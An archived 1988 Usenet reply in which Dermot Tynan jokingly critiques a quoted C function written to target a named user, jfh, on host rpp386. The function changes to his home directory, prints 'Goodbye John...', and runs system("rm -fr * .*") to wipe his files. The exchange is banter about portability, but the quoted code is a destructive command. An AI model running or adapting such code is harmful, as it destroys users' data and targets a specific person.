none.

Der Tynan dtynan at sultra.UUCP
Tue Nov 22 13:29:48 AEST 1988

In article <9784 at watdragon.waterloo.edu>, tcjones at watdragon.waterloo.edu (Terry Jones) writes:
> Here's a handy-dandy little function that I just whipped up. Took me about
> 4 or 5 hours to get the bugs out, but I'm just a college student :-)

Hate to tell you this, but you need another 4 or 5 hours :-)

> void
> get_John_F_Haugh_II()
> {
> 	struct passwd *pwd = getpwnam("jfh");
> 	char host[1024];

First, how do you know he'll run it as 'jfh'.  You should check uid's.

> 	if (pwd == NULL) return;
> 	if (gethostname(host, sizeof(host)) == -1) return;
	    ^^^^^^^^^^^
Hmmm.  Isn't that a BSD system call??

> 	if (strcmp(host, "rpp386")) return;
			  ^^^^^^
My guess is, rpp386 is a '386 machine, probably running XEN*X or Microport
UN*X.  In which case, the above system call fails to link.  Tough luck.

> 	if (chdir(pwd->pw_dir) == -1) return;
> 	if (fprintf(stderr, "Goodbye John...\n") == EOF) return;

Don't forget that the 'stderr' channel is usually unbuffered.  If *I* saw that
message appear, I'd *very quickly* hit ^C, a few dozen times...

> 	system("rm -fr * .*");
> 	return;
> }

It probably wouldn't get very far.  Oh well.  Seeing as you're a college
student, I'm thinking about sending this program (?) to your Prof., so he
can grade you on it.  Personally, I'd give you a C+ (No, not C++ :-).  Mainly
for effort :-)
						- Der
--
	dtynan at zorba.Tynan.COM  (Dermot Tynan @ Tynan Computers)
	{apple,mips,pyramid,uunet}!Tynan.COM!dtynan

 ---  If the Law is for the People, then why do we need Lawyers? ---